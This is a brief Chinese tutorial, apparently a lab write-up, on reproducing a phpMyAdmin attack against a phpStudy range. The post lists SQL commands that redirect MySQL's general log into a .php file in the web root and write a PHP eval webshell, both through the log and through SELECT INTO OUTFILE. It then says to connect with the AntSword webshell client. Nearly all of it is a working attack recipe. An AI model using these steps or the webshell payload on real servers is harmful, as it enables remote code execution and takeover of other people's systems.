PhPMyadmin-cms漏洞复现

cr.sheeper2024-12-29 20:11

一.通过日志文件拿Shell

打开靶场连接数据库

来到sql中输入

复制代码

show global variables like '%general%';

复制代码

set global general_log='on'; //⽇志保存状态开启；

复制代码

set global general_log_file = 'D:/phpstudy/phpstudy_pro/WWW/123.php'  //修改日志保存位置

复制代码

show global variables like '%general%';

复制代码

select '<?php eval($_POST[cmd]);?>';

看看是否能连接成功

输入select @@datadir我们可以看到mysql路径

所以我们推测web路径为D:/phpstudy/phpstudy_pro/WWW

复制代码

select "<?php eval($_POST[a]);?>" into outfile 'D:/phpstudy/phpstudy_pro/WWW/666.php'

去访问

再用蚁剑连接一下试试